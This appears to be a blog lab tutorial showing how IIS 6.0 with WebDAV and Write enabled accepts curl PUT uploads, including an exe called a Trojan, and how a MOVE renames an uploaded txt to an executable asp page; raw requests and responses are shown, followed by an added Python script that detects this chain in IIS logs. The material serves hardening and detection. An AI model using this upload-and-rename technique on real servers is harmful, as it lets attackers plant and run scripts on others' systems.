Test environment: a virtual machine running Windows Server 2003 with IIS enabled, plus a Windows XP client. Note: only the IIS components are installed on the server, no site has been configured yet, and the default NTFS security settings are used on all partitions.
Server | Client
Name: WWW1 | Name: Test1
OS: Windows Server 2003 | OS: Windows XP Pro
Software: IIS 6.0 + .NET 2.0 SP2 | Software: curl for Windows (c:\curl), iiswrite (c:\iiswrite)
IP: 192.168.1.11 | IP: 192.168.1.101
Steps:

1. A test page whose content is "hello" is used as the site's home page.

2. Open the IIS management tool on WWW1, right-click the default website and delete it, then delete the default application pool. Create an application pool named test and a new website test.com with its home directory set to d:\webdata\test, keeping the default settings for everything else. Assign the test.com website to the test application pool; execute permissions stay at "Scripts only".

3. On client Test1, edit the hosts file and add the line "192.168.1.11 test.com". Entering http://test.com in the browser now shows the home page on WWW1.

4. On Test1, open a command prompt, change to the curl directory and try to upload the file d:\test.txt. Note: "Write" permission is NOT enabled on the server at this point. (-T uploads the named file; -v shows the full exchange.)

   C:\curl> curl -T d:\test.txt http://test.com/ -v
   * About to connect() to test.com port 80 (#0)
   * Trying 192.168.1.11... connected
   * Connected to test.com (192.168.1.11) port 80 (#0)
   > PUT /test%2Etxt HTTP/1.1
   > User-Agent: curl/7.19.4 (i586-pc-mingw32msvc) libcurl/7.19.4 OpenSSL/0.9.8g zlib/1.2.3
   > Host: test.com
   > Accept: */*
   > Content-Length: 48
   > Expect: 100-continue
   >
   < HTTP/1.1 501 Not Implemented        (the file cannot be PUT)
   < Content-Length: 0
   < Server: Microsoft-IIS/6.0
   < X-Powered-By: ASP.NET
   < Date: Tue, 21 Dec 2010 03:46:32 GMT
   <
   * Connection #0 to host test.com left intact
   * Closing connection #0

5. Enable the "Write" permission on WWW1.

6. Repeat the curl upload command on Test1. Note: "Write" permission is now enabled.

   C:\curl> curl -T d:\test.txt http://test.com/ -v
   * About to connect() to test.com port 80 (#0)
   * Trying 192.168.1.11... connected
   * Connected to test.com (192.168.1.11) port 80 (#0)
   > PUT /test%2Etxt HTTP/1.1
   > User-Agent: curl/7.19.4 (i586-pc-mingw32msvc) libcurl/7.19.4 OpenSSL/0.9.8g zlib/1.2.3
   > Host: test.com
   > Accept: */*
   > Content-Length: 48
   > Expect: 100-continue
   >
   < HTTP/1.1 501 Not Implemented        (the file still cannot be PUT; why?)
   < Content-Length: 0
   < Server: Microsoft-IIS/6.0
   < X-Powered-By: ASP.NET
   < Date: Tue, 21 Dec 2010 03:53:00 GMT
   <
   * Connection #0 to host test.com left intact
   * Closing connection #0

7. In Web Service Extensions on WWW1, set WebDAV to "Allowed".

8. Back on Test1, repeat the curl upload command. Note: "Write" permission and WebDAV are now both enabled.

   C:\curl> curl -T d:\test.txt http://test.com/ -v
   * About to connect() to test.com port 80 (#0)
   * Trying 192.168.1.11... connected
   * Connected to test.com (192.168.1.11) port 80 (#0)
   > PUT /test%2Etxt HTTP/1.1
   > User-Agent: curl/7.19.4 (i586-pc-mingw32msvc) libcurl/7.19.4 OpenSSL/0.9.8g zlib/1.2.3
   > Host: test.com
   > Accept: */*
   > Content-Length: 48
   > Expect: 100-continue
   >
   < HTTP/1.1 100 Continue
   < HTTP/1.1 201 Created                (the file has been PUT successfully)
   < Date: Tue, 21 Dec 2010 03:56:52 GMT
   < Server: Microsoft-IIS/6.0
   < X-Powered-By: ASP.NET
   < Location: http://test.com/Test.txt  (the uploaded file can also be viewed at this URL)
   < Content-Length: 0
   < Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
   <
   * Connection #0 to host test.com left intact
   * Closing connection #0

9. Next, try uploading an exe file (or a Trojan program) from Test1:

   C:\curl> curl -T d:\test.exe http://test.com/ -v
   * About to connect() to test.com port 80 (#0)
   * Trying 192.168.1.11... connected
   * Connected to test.com (192.168.1.11) port 80 (#0)
   > PUT /test%2Eexe HTTP/1.1
   > User-Agent: curl/7.19.4 (i586-pc-mingw32msvc) libcurl/7.19.4 OpenSSL/0.9.8g zlib/1.2.3
   > Host: test.com
   > Accept: */*
   > Content-Length: 0
   > Expect: 100-continue
   >
   < HTTP/1.1 201 Created                (exe, vbs and other executable files can be uploaded; only asp cannot)
   < Date: Tue, 21 Dec 2010 04:01:51 GMT
   < Server: Microsoft-IIS/6.0
   < X-Powered-By: ASP.NET
   < Location: http://test.com/Test.exe
   < Content-Length: 0
   < Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
   <
   * Connection #0 to host test.com left intact
   * Closing connection #0

   The upload alone has already done damage at this step. It becomes far more dangerous if "Script source access" is also ticked by accident.

10. Enable "Script source access" on WWW1. Note: once this option is checked, script files such as asp can be executed, but this does not mean that asp files can be uploaded directly.

11. Because asp files cannot be uploaded directly, first PUT a txt file and then turn it into an asp file with a MOVE. Create a new text file test.txt on Test1, paste the prepared code into it, and open the program c:\iiswrite.exe (a tool that can issue the various HTTP/1.1 methods). Select the PUT operation, choose the test.txt file, and click "Submit packet".
[Screenshot: iiswrite PUT of test.txt]
In the output above we can see that the PUT succeeded (201 Created). Next, change the file's extension with a MOVE. The MOVE request is shown below; the values marked in red in the tool's window are the ones to change.

   MOVE /test.txt HTTP/1.1                 (name of the file that was PUT)
   Host: test.com                          (destination host name)
   Destination: http://test.com/test.asp   (new file name)
[Screenshot: MOVE request and its response]
201 Created -- the expected result. 13. On the Test1 client, open the asp file in IE at http://test.com/test.asp and see the effect of the malicious code in the images below.
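From the defender's side, the sequence demonstrated above leaves a clear trace in the IIS log: a PUT answered with 201, a MOVE of the same path by the same client, and then a GET of a file with a script extension that returns 200. The script below is an added example (not from the original post) that parses IIS 6.0 W3C extended log lines and flags exactly that chain. The log lines are constructed to mirror the exchange in the article, the field layout is the IIS 6 default, and because IIS does not log the Destination header of a MOVE, the MOVE of a previously uploaded file is itself treated as the signal.

```python
"""Flag WebDAV write activity in IIS 6.0 W3C extended log lines.

Added example, not from the original post. SAMPLE_LOG is constructed to
mirror the article's exchange: a PUT refused with 501, a PUT accepted with
201 once Write + WebDAV are on, a PUT of an .exe, a MOVE of the uploaded
.txt (the rename-to-.asp trick) and a GET of the resulting .asp page.
"""
import os
from collections import defaultdict

# Methods that create, change or remove content on the server.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "PROPPATCH", "MKCOL"}
# Extensions IIS 6 hands to ASP / ASP.NET / SSI instead of serving as static files.
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".asa", ".cer", ".cdx", ".shtml", ".shtm", ".stm"}

# Constructed sample in the IIS 6 W3C extended format (default field set).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2010-12-21 03:46:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2010-12-21 03:46:32 192.168.1.11 PUT /test.txt - 80 - 192.168.1.101 curl/7.19.4 501 0 0
2010-12-21 03:56:52 192.168.1.11 PUT /test.txt - 80 - 192.168.1.101 curl/7.19.4 201 0 0
2010-12-21 03:57:10 192.168.1.11 GET /test.txt - 80 - 192.168.1.101 Mozilla/4.0 200 0 0
2010-12-21 04:01:51 192.168.1.11 PUT /test.exe - 80 - 192.168.1.101 curl/7.19.4 201 0 0
2010-12-21 04:10:03 192.168.1.11 MOVE /test.txt - 80 - 192.168.1.101 iiswrite 201 0 0
2010-12-21 04:11:20 192.168.1.11 GET /test.asp - 80 - 192.168.1.101 Mozilla/4.0 200 0 0
"""


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields = None
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Version, #Date)
        if fields is None:
            raise ValueError("log data appears before a #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated line: skip rather than guess
        records.append(dict(zip(fields, values)))
    return records


def _succeeded(record):
    return 200 <= int(record["sc-status"]) < 300


def find_webdav_writes(records):
    """Every record where a write method received a 2xx response."""
    return [r for r in records if r["cs-method"] in WRITE_METHODS and _succeeded(r)]


def find_upload_rename_chain(records):
    """(client, path, timestamp) for each successful MOVE of a path that the
    same client had previously PUT successfully."""
    uploaded = defaultdict(set)  # client ip -> paths PUT with 2xx
    alerts = []
    for r in records:
        if not _succeeded(r):
            continue
        client, path = r["c-ip"], r["cs-uri-stem"].lower()
        if r["cs-method"] == "PUT":
            uploaded[client].add(path)
        elif r["cs-method"] == "MOVE" and path in uploaded[client]:
            alerts.append((client, path, r["date"] + " " + r["time"]))
    return alerts


def find_scripts_served_after_write(records):
    """(client, path) for each 2xx GET of a script-extension file whose base
    name matches something previously written through PUT or MOVE."""
    written_stems = set()
    alerts = []
    for r in records:
        if not _succeeded(r):
            continue
        path = r["cs-uri-stem"].lower()
        stem, ext = os.path.splitext(path)
        if r["cs-method"] in ("PUT", "MOVE"):
            written_stems.add(stem)
        elif r["cs-method"] == "GET" and ext in SCRIPT_EXTENSIONS and stem in written_stems:
            alerts.append((r["c-ip"], path))
    return alerts


if __name__ == "__main__":
    recs = parse_w3c(SAMPLE_LOG)
    for r in find_webdav_writes(recs):
        print("WRITE ", r["date"], r["time"], r["c-ip"], r["cs-method"], r["cs-uri-stem"], r["sc-status"])
    for client, path, when in find_upload_rename_chain(recs):
        print("RENAME", when, client, "moved previously uploaded", path)
    for client, path in find_scripts_served_after_write(recs):
        print("EXEC  ", client, "fetched a script created by a WebDAV write:", path)
```

Run against a real log directory the same parser applies unchanged; the only site-specific choice is the set of script extensions, which should match the application mappings actually configured on the server.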
[Screenshot: http://test.com/test.asp opened in IE]
[Screenshot: output of the uploaded asp page]
View system user list
[Screenshot: view system user list]
Trojan
[Screenshot: Trojan]
Conclusion: enabling WebDAV together with the "Write" permission exposes websites and servers to serious security risks. These problems can be avoided by configuring the site carefully by hand. If "Script source access" is also ticked by accident, allowing unauthorised users to PUT and then execute asp script files, the consequences would be unimaginable. At the request of fellow bloggers, the full PDF document is available for download: http://down.51cto.com/data/154237
This article is from the "Leaves Station" blog; please keep this source: http://yangye.blog.51cto.com/922715/461590